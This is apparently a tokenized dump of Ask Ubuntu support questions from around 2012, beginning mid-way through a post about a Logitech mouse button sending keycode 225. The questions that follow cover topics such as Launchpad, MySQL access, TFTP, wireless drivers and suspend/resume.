, but there 's still something weird . edit 2 i tried to run xinput ( never heard of this command . amazing stuff ) . there are two entries for logitech . here is the output of listing each of them ( id 9 and 10 ) logitech usb receiver id=9 [ slave pointer ( 2 ) ] reporting 7 classes : class originated from : 9 . type : xibuttonclass buttons supported : 24 button labels : `` button left '' `` button middle '' `` button right '' `` button wheel up '' `` button wheel down '' `` button horiz wheel left '' `` button horiz wheel right '' `` button side '' `` button extra '' `` button forward '' `` button back '' `` button task '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' button state : class originated from : 9 . type : xivaluatorclass detail for valuator 0 : label : rel x range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 9 . type : xivaluatorclass detail for valuator 1 : label : rel y range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 9 . type : xivaluatorclass detail for valuator 2 : label : rel horiz wheel range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 9 . type : xivaluatorclass detail for valuator 3 : label : rel vert wheel range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 9 . type : xiscrollclass scroll info for valuator 2 type : 2 ( horizontal ) increment : 1.000000 flags : 0x0 class originated from : 9 . type : xiscrollclass scroll info for valuator 3 type : 1 ( vertical ) increment : -1.000000 flags : 0x2 ( preferred ) logitech usb receiver id=10 [ slave pointer ( 2 ) ] reporting 6 classes : class originated from : 10 . type : xibuttonclass buttons supported : 7 button labels : `` button 0 '' `` button unknown '' `` button unknown '' `` button wheel up '' `` button wheel down '' `` button horiz wheel left '' `` button horiz wheel right '' button state : class originated from : 10 . type : xikeyclass keycodes supported : 248 class originated from : 10 . type : xivaluatorclass detail for valuator 0 : label : rel x range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 10 . type : xivaluatorclass detail for valuator 1 : label : rel y range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 10 . type : xivaluatorclass detail for valuator 2 : label : rel horiz wheel range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 10 . type : xiscrollclass scroll info for valuator 2 type : 2 ( horizontal ) increment : 1.000000 flags : 0x0 testing device 9 does not do anything with the button . testing device 10 instead works , and this is the output as i click $ xinput test 10 key press 225 key release 225 key press 225 key release 225 key press 225 key release 225 so it appears that the mouse acts as a keyboard in this regard , but for some reason , xmodmap does not do anything when it receives key 225 . ** edit ** i can confirm that adding keycode 225 = a prints an a every time i click the button . so the problem seems to be related to how xf86paste is actually handled . i am sending it , but it 's not pasting .
237257	can i use the launchpad translation service for my github project ?	for historical reasons , the project i co-author is on github and we feel comfortable with its development processes . thus we do n't particularly want to migrate the whole project to launchpad and using bazaar . being good internet-citizens we want to provide our open-source application in as many languages as possible - we stumbled across whilst searching that launchpad could provide such a service . https : //help.launchpad.net/translations the above link gives lots of description on this service , but i need a concise - very brief - how to : get our translation file ( package.pot ) from github into launchpad brief description how to kick off our project to be translated . pull back from launchpad any translation files ( .po ) that are generated by the wonderful translation team back into github . does anybody have any practical experience do this that can help here ?
237261	where do `` internal error '' error reports go ?	every so often ubuntu detects an internal error that it reports with a dialog box that looks something like this : if i `` send an error report to help fix this problem '' ( via the checkbox ) , where do the error reports go ? i imagine this gets entered into a bug tracker somewhere , but which one ? can i `` watch '' this bug , to get notification when it is fixed ?
237268	keyboard shortcuts do not work after reboot	in my ubuntu 12.04 installation the media keyboard shortcuts do not work after reboot . the shortcuts are still saved and visible in the control pane , but no action is performed when using those shortcuts . example : i use alt + + ( num block ) ( louder ) and alt + - ( num block ) ( quieter ) on the numeric block . i also use alt + pgup ( previous title ) and alt + pgdn ( next title ) . all those shortcuts do not work after a reboot , independently of whether clementine was launched or not . could anyone explain that behavior and know a workaround ? update : i 've set those keyboard shortcuts in the global gnome keyboard configuration ( sub-item `` sound and media '' ) . clementine is configured to use the gnome shortcuts .
237272	how to put /opt and /home on the same partition but different from / ?	i 'd like to install ubuntu on two drives , one with / and the other with /opt and /home . but i do not want /opt and /home to reside on separate partitions but on the same one . is it possible to do during the installation ?
237273	ubuntu where to start ( newbie )	i was a hardcore windows user for years . i already tried ubuntu 12.10 by using wubi . but in my exerpience , the wubi version is feeling a bit too much as a virtual machine version of ubuntu , and i succeed to destroy my wubi install within a few days ( noob ? ) . here is the problem : i want to run ubuntu on one of my computers or otherwise i am interested in buying a computer capable of running ubuntu . i have a laptop ( hp pavilion dm1 ) , that had no cd-drive , and sees the ubuntu-usb as usb-floppy during the boot . which cases a failure on loading the usb . and it does not read the usb when i select it manually . and wubi is not really an option for me . i also have another computer that is brand-less and has parts from very different manufacturers . this pc does not recognize the ubuntu usb and the ubuntu cd during a boot . another solution would be a new other laptop . but in that case i want a laptop that can run ubuntu for 100 % sure . and it has to be not to expensive . and because i want to use ubuntu , i do n't want to pay for another useless windows serial key . i life in the netherlands and i really have no idea or there are pay-able ( so not overpriced ) laptops sold in the netherlands that have ubuntu pre-installed , or where ubuntu can be installed on ( without paying for another windows licence ) . so what do you , the ubuntu community recommend ? do you have an solution so i could run it on my current computers as dual boot or would it be better to buy a new laptop ? and what would be a good laptop to get started with , that are being sold in the netherlands ?
237275	does brightness control not work on desktop environments by design ?	i am using ubuntu 12.04 on a desktop and on a netbook . on the netbook , the brightness control works fine out of the box via gui and hot keys . but on the desktop it does not . in the `` brightness and locks '' ui the brightness slider is missing , so it is only allows turning off of the display and locking . so i searched about brightness control and found this which points to an external application for external displays . does this really mean that brightness control is not for desktop environments by design ? is it because external monitors bring their own facilities for achieving this ? but i am really tired of clicking through these on screen displays just to adjust brightness to daylight changes . i would prefer to use the keyboard as i do on the netbook .
237276	ubuntu freez after selecting ubuntu from grub menu	my ubuntu freez after selecting ubuntu from grub menu all it show is cursor and `` [ ok ] '' text
237278	turning down wireless button turns down external usb wireless . lubuntu 12.10	i searched in other topics without luck . i 've got an eeepc 1000h and lubuntu 12.10 . when i turn down my laptop wireless capability ( fn+f2 ) it turns down the usb external antenna as well . i do n't want to exclude for ever my internal wireless ( as suggested in other answers ) i would like to turn down wireless with its button leaving usb-external-wifi on . as it is intended to be . any chance to get this working ? thanks in advance . rfkill list all 0 : asus-wlan : wireless lan soft blocked : no hard blocked : no 1 : asus-bluetooth : bluetooth soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no 4 : phy2 : wireless lan soft blocked : no hard blocked : no
237282	maas nodes ready but showing 0 cpu-count and 0 memory	i have a maas private cloud using ibm xserver 3550/3650 's . the cluster controller was set up with ubuntu server 12.10 and 6 nodes were pxe booted using maas default options . my problem is that all nodes show up in ready state but showing 0 cpu-count and 0 mb memory ( in reality all nodes have 2 xeon 5140 processors and 5 or 6 mb memory ) and when i try to bootstrap juju i get a `` no matching node is available '' error . does anyone have an idea what my problem is and/or how i can configure the nodes correctly in maas . hjortur
237283	how can i make my pendrive bootable ( my ubuntu copy is not an iso file ) ?	i have ubuntu 12.04 lts os . its not an image file/iso image . i have searched a lot about how to make a pendrive bootable in order to install ubuntu , but everywhere they assume that i have iso file . even i 've seen how to make bootable pendrive to install ubuntu os ? . so i 'm confused as i do n't know how to get boot manager to make my pendrive bootable . remember : my ubuntu copy is not an iso image file . simply copy-pasting those ubuntu files is not working .
237284	can not install ubuntu on my laptop	my laptop came preinstalled with windows 7 , and recently i tried to install ubuntu 12.10 , but my laptop does n't boot the cd . i was successful in installing ubuntu on another laptop with the same cd . i checked all bios options . also i tried all options of wubi.exe but it did n't work .
237285	should i use ubuntu 12.04 lts or 12.10 ?	recently i have some extra ordinary temptation over updating from 12.04 to 12.10 but i 'm not even sure about the differences between them . i know about lts versions and what does it mean , what i 'm looking for is some experimental ideas about stability , new features and the new kernel performance . does it worth it to update from 12.04 to 12.10 ? or it 's just a waste of time ? p.s : what about old hardwares compatibility ?
237287	tftp server not working	i 'm trying to set up a tftp server using xinetd but i have n't had any luck so far . i have installed the following packages : xinetd , tftpd , tftp . after that i changed the /etc/xinetd.d/tftp so that it would start the tftp automaticaly and even restarted the machine to see if it would work ( yes , i 'm that desperate ... ) . it does n't seem to get it working . then i tryed using the tftp command to get a file from another pc . here is the thing , i can get something from another tftp server , but not from my localhost . the other machine ca n't fetch anything from mine either . oh , and i did a chmod 777 to both /tftpboot and the foo file i 'm using in this test . anyone knows why am i the only being that ca n't use the tftp as it should ? just a last minute update , when i type `` status '' inside the tftp command i get this : tftp > status not connected . mode : netascii verbose : off tracing : off rexmt-interval : 5 seconds , max-timeout : 25 seconds thanks for the help !
237290	daily server reboot cron ?	i want to create a cron job which executes daiy at assigned time and it restart the ubuntu server . i try to add reboot only in cron , but it is not working , whereas it works when i try to execute it from cli . please advise , what command should i add in cron , so that it reboot the server daily at specific time .
237297	12.04 lts reboot issue : fsck forced	after having upgraded from 10.04 to 12.04 lts i have the following problems at shutdown/reboot : - the only way to reliably shot-down system is to log-out from all user and shut-down from login screen - even if i do that at reboot the system complains that disk has not been correctly unmounted and executes a fsck every time which causes the boot phase to last several minutes . does anybody know a way to do a clean unmount and avoid fsck at start-up thanks maurizio
237298	system is slow after resuming from hibernate	i installed ubuntu 12.10 64-bit and when the system wakes up after an hibernate , the mouse is extremely slow , the keyboard does n't seem to work and i 'm forced to reboot my computer . does somebody know a solution / workaround for this ?
237302	internal wifi adapter	i 'm new to ubuntu , i 've tried some of the past versions , but i can say that 12.10 is my first ... i 'm thinking about buying an internal wifi adapter , but since the one i can use on win xp and 7 does n't work properly on ubuntu , i wanted to ask if someone had any advice . i 'm already pointed to something like tp-link tl-wn881nd tl-wn781nd tl-wn851nd but , seing my prevous experiences i would like to know if someone has already tested one of them ... thanks everybody : )
237304	desktop files moved to secondary monitor	when i hook up a secondary monitor ( to give a presentation or something ) all my desktop files are placed on the secondary monitor . i want them to remain on my laptop desktop , which is emptied when i connect the secondary monitor . the laptopscreen ( lvds1 ) is already assigned as primary , and the taskbar is located on the laptopscreen . it 's just the desktop files that are located on the secondary monitor ( vga1 ) , i would really like to change this . i use 12.10 . any tips ? cheers
237307	remmina only runs as root	ubuntu 12.04.1 lts remmina 0.9.99.1 since upgrading to ubuntu 12.04 , i can only run remmina as root , with sudo . running as a normal user remmina comes up but does n't display any hosts and i ca n't exit the gui , i have to kill it from the command line . i tried removing with purge , re-installing.. and removed my home/user/.remmina directory but it did n't work . when i run with sudo , everything works fine . any ideas ?
237310	what fast image viewers are available for ubuntu ?	what is the fastest / most responsive image viewer ? i 'm looking for a program that is responsive and opens large .jpgs fast - progressively and/or by cleverly loading only parts it will render . a 6 mb picture has a resolution of 4000x3000 , while my eeepc only has 1024x600 , so i wo n't see a lot of the pixels anyway . another technique is to cache pictures in the background while i 'm viewing the first . a lot of programs on windows do stuff like that , is there anything you can recommend for an eeepc running ubuntu ? context : i recently switched to xfce to revive my eeepc ( as gnome shell and unity are somewhat slow on it ) . i 'm generally satisfied as it runs pretty snappy , and i can get work done on the go . however , i 'd like to organize some fotos that i have , and all the image viewers i tried are too slow . for example , ristretto , xfce 's lean image viewer , takes about a second to open a picture of 1.8 mb ( 5 seconds for a 6 mb picture ) , and freezes in that time .
237311	not recognising 4gb of ram	i have a pae kernel but free -m only shows 3.2 gigs of the 4 gb that is physically installed . the bios shows 4 gb available . uname -a gives : 3.2.0-35-generic-pae # 55-ubuntu smp wed dec 5 18:04:39 utc 2012 i686 athlon i386 gnu/linux so it is 32-bit but as i say pae . running ubuntu 12.04 . anybody any idea why it ca n't see the full 4gb ?
237314	browse vpn connected directory	i 've connected using cisco vpn client from my ubuntu to another ubuntu machine . so now i want to browse directories of that machine which i 'm connected through vpn , so how can i do it ?
237317	one.ubuntu.com wo n't let me upload a large file ( using firefox )	i am trying to upload a 4.4gb file to my one.ubuntu.com account . i have a 25gb account and am currently using only 350mb . when i click on the file i want to upload it says it 's uploading . when i open up the terminal and type in bmon it shows nothing happening . bmon is working because i tested it by uploading and downloading from other sites and it registers transmission rates . i first tried uploading this file yesterday and came back hours later and it was still saying 'uploading ' . that 's when i opened up bmon and saw that nothing was happening . i tried checking publish file and then unchecking it . did n't matter . i am using firefox on linux mint 14 . thank you .
237320	how can i suggest ideas to the `` ubuntu for phones '' project ?	are feature requests and ideas welcome ? to whom should i address them to ?
237321	where can i get the source code for `` ubuntu for phones '' ?	it says in your website that ubuntu is a free operating system . how can i get the source code for `` ubuntu for phones '' ?
237324	oracle java7 config	i 've installed oracle java 7 according to this guide . when i run sudo update-java-alternatives -s java-7-oracle , it gives me : update-alternatives : error : no alternatives for xulrunner-1.9-javaplugin.so . update-alternatives : error : alternative /usr/lib/jvm/java-7-oracle/jre/bin/jexec for jexec not registered , not setting . update-alternatives : error : alternative /usr/lib/jvm/java-7-oracle/jre/lib/amd64/libnpjp2.so for mozilla-javaplugin.so not registered , not setting . update-alternatives : error : no alternatives for xulrunner-1.9-javaplugin.so . what is the matter ? i use ubuntu12.04 amd64 .
237325	how ubuntu hibernate happen ?	hello guys i 'm pretty new to this site . i want to learn how the hibernate happening in ubuntu , can anyone suggest me a place ? i have done googling but still no luck . thanks.. !
237326	appmenu on xubuntu 12.10	is there anyone who succesfully managed to use an appmenu ( what was once called global menu in gnome 2.x ) on xubuntu 12.10 ? before answering please note that i tried with xfapplet ( which is no longer available on 12.10 ) and with this package xfce appmenu , which depends on the old libindicator6 ( on 12.10 there 's libindicator7 ) .
237331	can i pass a keystroke from command line into the gui	i am trying out different options for remote desktop control , and at the moment slashtop streamer seems promising due to the speed , and some other things regarding the way it handles multiple screens . my problem is that i would like to use wake-on-lan to boot my ubuntu desktop , so as to not waste a lot of power having the computer run all day while i 'm at school or the like , so the slashtop client needs to start on login . this is done with the startup applications system in ubuntu , but slashtop requires me to press the enter key in order to log in . so , is it possible to add something to the command line in startup apps , that tell the computer to pass this enter keystroke into the active window on the desktop ? i realise that this is a somewhat narrow question , and i a similar one being posted a while back that got shut down due to it 's less than broad nature , but i hope to get an answer none the less .
237335	where can i get unity source	i would like to test unity in a funtoo environment . therefore i need to manually install it from source . is there a git i can download from ? thank 's in advance .
237336	how to hide filepath and page number in gedit for printing	i have to submit report on my project and i need to print source code but gedit includes file path , filename and page number at the top of the page how to remove it ?
237340	ubuntu 12.04 hp dv7 suspend works , resume does n't	so my issue is that the suspension works , but once i resume , it will just stay in a black screen . closing and opening the lid does nothing . i tried all sorts of things already with no luck . can anyone see where the issue lies ? these are my specs : hp pavilion dv7t-4000 cto select edition intel ( r ) core ( tm ) i7-720qm quad core processor 1gb ati mobility radeon ( tm ) hd 5650 [ hdmi , vga ] intel wireless-n card with bluetooth you can see some of my logs here : http : //rclai89.koding.com/specs.html there i listed the pm-suspend.log , syslog and code i used on the 20_custom-ehci_hcd file from here : http : //ubuntuforums.org/showthread.php ? p=11926504 and made it easy to navigate thanks to css and some html tricks . this is my current kernel build : 3.2.0-35-generic 64-bit and my fglrx version : 9.002 ( i downloaded the drivers from the amd support page ) any help would be greatly appreciated . : ) edit : oh wow , this is weird , it 's now working . what happened was , i re-installed ubuntu . what i did differently . i auto-updated everything and kept my kernel 3.2.0-35-generic installation , i did not update to 3.4 . what i did differently is instead of installing the graphics drivers from amd , i installed the graphics using sudo apt-get install fglrx so now my fglrx version is 8.960 . while my suspension works , i notice that resuming will start up the screen on the lowest brightness setting , however once i hit the hotkeys to increase the brightness , the brightness goes back to normal .
237342	how to set up launchpad to import from github ?	i 'm setting up my first launchpad project . in this case i would like to import from the master branch from my github project - the default branch is not master - it is a release branch currently called `` release-0.6 '' on launchpad i have set up to automatically import : as you can see , the import failed - the error log states : 2013-01-07 14:45:11 info starting job . 2013-01-07 14:45:11 info getting exising bzr branch from central store . 2013-01-07 14:45:14 info [ chan bzr socketaschanneladapter ] opened sftp connection ( server version 3 ) 2013-01-07 14:45:17 info [ chan bzr socketaschanneladapter ] opened sftp connection ( server version 3 ) 2013-01-07 14:45:17 info 291 bytes transferred 2013-01-07 14:45:18 info no branch found at remote location . this is strange since my github project is obviously at the correct web-location . thus - what have i done wrong in my configuration ? i.e . how should i have set up my launchpad project to import from github ?
237349	how to define completely new xdg-user-dirs ?	i 've just configured my ~/.config/user-dirs.dirs file under unity ( ubtuntu 12.10 ) and everything works well so far . but is there any chance to extend the user dirs like this : xdg_ubuntuone_dir= '' $ home/ubuntu one '' xdg_dropbox_dir= '' $ home/dropbox '' xdg_temporary_dir= '' /media/systemdata/temporary data '' as you can see i want to define completely new entries . how can i define them and e.g . specify icons for those new entries ? thx bks
237352	software center internal error - astrill vpn install	just installed ubuntu 12.10 today . downloaded the `` astrill-setup-linux.deb '' file from the astrill vpn website after being directed there by tech support . go to open it and get an `` internal error '' message . has anybody had this problem before ?
237355	no application switcher in compiz settings manager	i had the problem of no alt+tab in gnome classic on ubuntu 12.10 so after reading a bit i found a solution . the solution consisted of installing compizconfig settings manager and enabling application switcher . the problem is that i can not find that icon it is not in the window management tab of compiz . ok after many frustrating hours . i have completely uninstalled the gnome-shell using this as a guide : remove gnome shell completely after installing it ? . i then reinstalled it and the problem was still there . then i took a look at a fresh install of 12.10 and the same problem was there as well . then i took a look at a fresh install of 12.04 and the problem was n't there . the option to add application switching was there and i was able to enable it . i have no idea why that option is not in 12.10 .
237358	ubuntu wont recognize my wireless network card	ok , i 'm semi competent with computers , even less so with ubuntu , brand new to this os ... but here we go.. ubuntu wont recognize my wireless ... here is how kernel recognizes it : *-network description : ethernet interface product : 88e8040 pci-e fast ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 12 serial : 00:21:9b : ef:1d:12 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 duplex=full ip=192.168.0.14 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:44 memory : fe8fc000-fe8fffff ioport : de00 ( size=256 ) *-network description : network controller product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:17 memory : fe7fc000-fe7fffff usb wireless card : : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub pci wireless card : : 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 0c ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 02 ) 00:1c.4 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 5 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f2 ) 00:1f.0 isa bridge : intel corporation 82801hm ( ich8m ) lpc interface controller ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 02 ) 02:09.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 05 ) 02:09.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 22 ) 02:09.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 12 ) 02:09.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 12 ) 09:00.0 ethernet controller : marvell technology group ltd. 88e8040 pci-e fast ethernet controller ( rev 12 ) 0b:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) and `` rfkill list all '' does nothing .
237362	mysql access denied for user 'root ' while using lamp	i 'm just want to install lamp server + phpmyadmin normally in case of when setting up mysql i get this error : error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : no ) i do n't know what this is . i do n't know how to run php code in ubuntu because it 's my first deal with linux .
237368	authentication problem-i ca n't enable my wireless driver	i have just installed ubuntu 12.10 after trying it on a usb stick which worked fairly well . but currently i am not able to install anything because every time i want to do something i 'm prompted to enter a password and even when i provide the correct password i ca n't change anything ! biggest problem is to activate the wireless driver ! i could not enable the driver and i 'm not able to connect to the internet now ! please help me to deactivate the authentication . regards
237373	add ubuntu live to another ubuntu+windows system	i 've got win7 in a ntfs-partition and lubuntu 12.10 in another one . **sudo fdisk -l** disco /dev/sda : 160.0 gb , 160041885696 bytes 255 cabezas , 63 sectores/pista , 19457 cilindros , 312581808 sectores en total unidades = sectores de 1 * 512 = 512 bytes tamaño de sector ( lógico / físico ) : 512 bytes / 512 bytes tamaño e/s ( mínimo/óptimo ) : 512 bytes / 512 bytes identificador del disco : 0x000c119a dispositivo inicio comienzo fin bloques id sistema /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 230688767 115240960 7 hpfs/ntfs/exfat /dev/sda3 230688768 266340351 17825792 7 hpfs/ntfs/exfat /dev/sda4 266342398 312581429 23119516 f w95 ext 'd ( lba ) /dev/sda5 301644014 307068299 2712143 b w95 fat32 /dev/sda6 307068314 312581429 2756558 b w95 fat32 /dev/sda7 266342400 295784447 14721024 83 linux /dev/sda8 295786496 301643775 2928640 82 linux swap / solaris las entradas de la tabla de particiones no están en el orden del disco before i got lubuntu i used to create a small partition and with easybcd ( windows ) i used to load a small linux iso as live . now i 'm wondering if i do that in windows ( considering i already modified my grub since i 've got lubunto installing ) will i destroy or have problems ? i would like to install this linux-live in sda5 . how could i do ? thank you .
237378	how do i enable touchscreen on my q200e asus laptop ?	i 've been trying to figure this one out for a while now with no luck . i 'm brand new to ubuntu , and the laptop came preinstalled with windows 8 . i went and installed ubuntu 12.04 which was a pain because of the new windows 8 uefi or whatever it is . now i ca n't get the touchscreen to work on ubuntu . any help is appreciated !
237387	touchpad : how can i keep my palms touching the top corners from registering as a two-finger scroll ?	i have a 2011 macbook pro , and when i 'm typing my palms cover the upper corners of the touchpad , and frequently touch at the same time . it seems palm detection is n't working , or possibly a small enough portion of my palm touches the corner so that it registers as a finger . at any rate , i frequently get a two-finger scroll action occurring as a result of this , which can lead to some very annoying results while typing text . it seems to me that a two-finger scroll should only be registered if the fingers are somewhat close together , not at opposite sides of the pad . is there a setting for the synaptics driver that i can change this behavior ?
237390	how to get the crash log file for lightworks ?	so i got beta access to lightworks and it crashes a lot sadly i can not get terminal output is there a way to get software crash log file ? ? ?
237392	how to get an intersil isl3887 wireless adaptor working	i have an old wireless adaptor that i used to use in ubuntu until it seemed like it was no longer supported , i ca n't remember exactly when , but think it was around 10.10 maverick . i have just dug it out as my children 's laptop wireless card has gone kaput . my old usb wireless card is not seen by network-manager . doing lsusb it shows : bus 002 device 003 : id 1435:0427 wistron neweb ur054g 802.11g wireless adapter [ intersil isl3887 ] this link would suggest that the device is still supported by the linux kernel this link provides instructions for enabling the device in debian systems is there a way i can get it to work in ubuntu 12.04 32bit ? p.s . i have tried sudo apt-get install linux-backports-modules-cw-3.6-precise-genericwithout luck result of dmesg|grep p54 [ 22.706862 ] p54common : disagrees about version of symbol ieee80211_free_hw [ 22.706870 ] p54common : unknown symbol ieee80211_free_hw ( err -22 ) [ 22.706876 ] p54common : disagrees about version of symbol ieee80211_alloc_hw [ 22.706879 ] p54common : unknown symbol ieee80211_alloc_hw ( err -22 ) [ 22.706887 ] p54common : disagrees about version of symbol ieee80211_beacon_loss [ 22.706890 ] p54common : unknown symbol ieee80211_beacon_loss ( err -22 ) [ 22.706909 ] p54common : disagrees about version of symbol regulatory_hint [ 22.706912 ] p54common : unknown symbol regulatory_hint ( err -22 ) [ 22.706921 ] p54common : disagrees about version of symbol ieee80211_register_hw [ 22.706923 ] p54common : unknown symbol ieee80211_register_hw ( err -22 ) [ 22.706938 ] p54common : disagrees about version of symbol ieee80211_get_hdrlen_from_skb [ 22.706941 ] p54common : unknown symbol ieee80211_get_hdrlen_from_skb ( err -22 ) [ 22.706950 ] p54common : disagrees about version of symbol __ieee80211_get_radio_led_name [ 22.706953 ] p54common : unknown symbol __ieee80211_get_radio_led_name ( err -22 ) [ 22.706964 ] p54common : disagrees about version of symbol ieee80211_wake_queue [ 22.706967 ] p54common : unknown symbol ieee80211_wake_queue ( err -22 ) [ 22.706977 ] p54common : disagrees about version of symbol __ieee80211_get_tx_led_name [ 22.706980 ] p54common : unknown symbol __ieee80211_get_tx_led_name ( err -22 ) [ 22.706992 ] p54common : disagrees about version of symbol ieee80211_tx_status_irqsafe [ 22.706994 ] p54common : unknown symbol ieee80211_tx_status_irqsafe ( err -22 ) [ 22.707005 ] p54common : disagrees about version of symbol wiphy_rfkill_set_hw_state [ 22.707008 ] p54common : unknown symbol wiphy_rfkill_set_hw_state ( err -22 ) [ 22.707020 ] p54common : disagrees about version of symbol __ieee80211_get_rx_led_name [ 22.707023 ] p54common : unknown symbol __ieee80211_get_rx_led_name ( err -22 ) [ 22.707034 ] p54common : disagrees about version of symbol ieee80211_queue_delayed_work [ 22.707037 ] p54common : unknown symbol ieee80211_queue_delayed_work ( err -22 ) [ 22.707064 ] p54common : disagrees about version of symbol ieee80211_stop_queue [ 22.707067 ] p54common : unknown symbol ieee80211_stop_queue ( err -22 ) [ 22.707074 ] p54common : disagrees about version of symbol __ieee80211_get_assoc_led_name [ 22.707077 ] p54common : unknown symbol __ieee80211_get_assoc_led_name ( err -22 ) [ 22.707090 ] p54common : disagrees about version of symbol ieee80211_unregister_hw [ 22.707093 ] p54common : unknown symbol ieee80211_unregister_hw ( err -22 ) [ 22.707098 ] p54common : disagrees about version of symbol ieee80211_beacon_get_tim [ 22.707101 ] p54common : unknown symbol ieee80211_beacon_get_tim ( err -22 ) [ 22.707118 ] p54common : disagrees about version of symbol ieee80211_rx_irqsafe [ 22.707121 ] p54common : unknown symbol ieee80211_rx_irqsafe ( err -22 )
237395	is there any linux alternative for rainmeter ?	rainmeter is a popular software used to customise windows desktop . is there any linux alternative for rainmeter to use in ubuntu 12.04 ? the desktop in ubuntu looks plain !
237399	ubuntu wo n't install on my windows pc	my work computer has a trojan horse that i 'm tired of trying to get rid of , so i 've decided just to wipe my hard drive and install ubuntu . first question , i am under the understanding that simply installing ubuntu will wipe my computer . true ? second , i downloaded ubuntu onto a dvd ( it wouldnt fit on a cd ) from my mac and popped it in my pc ( windows xp ) . when booting , it opened windows automatically . so i tried restarted and hitting f12 to force it to start from the disc drive . it still would n't go . nothing even opened . it just said it would n't work . is this a problem with what i 'm doing or my pc ?
237401	why phpmyadmin did n't work ?	when run phpmyadmin it is not working and i get this message : not found the requested url /phpmyadmin/ was not found on this server . apache/2.2.22 ( ubuntu ) server at localhost port 80 how it 's not found in case of i 'm just setting up from few minutes . and i just use the commands in this link http : //www.howtoforge.com/ubuntu_lamp_for_newbies without this comand mysql -u root and mysql > set password for 'root ' @ 'localhost ' = password ( 'yourpassword ' ) ; because i get this error error 1045 : access denied for user : 'root @ localhost ' ( using password : no ) and i do n't know about that command because it 's first deal with ubuntu
237403	how do i install ibm lotus symphony after receiving the error in the description ?	warning : skipping conversion of scripts in package symphony : postinst postrm preinst prerm warning : use the -- scripts parameter to include the scripts . mkdir : can not create directory `symphony-3.0.1 ' : file exists unable to mkdir symphony-3.0.1 : at /usr/share/perl5/alien/package.pm line 257 . is the error i receive after running : sudo alien -i '/home/brentonhorne/downloaddirector/symphony-3.0.1.i586.rpm' where the rpm symphony file is located at the place detailed in the code above . ( i could n't find a deb file at the ibm lotus symphony site ) and i have run sudo alien -c '/home/brentonhorne/downloaddirector/symphony-3.0.1.i586.rpm' where -c equates to running -- scripts . i am running 32 bit 12.10 if these details are required .
237413	is it safe to restart compiz ?	i have the situation that my ubuntu session is frozen such that i can not move my mouse or type . i managed to stop all heavy tasks by accessing a tty with ctrl+alt+f2 , so technically it should recover to a usable state . however , the screen is still frozen , so i suspect it would be a good idea to force compiz to restart . it is safe to kill compiz and then restart it without any of my applications/terminals to be killed ?
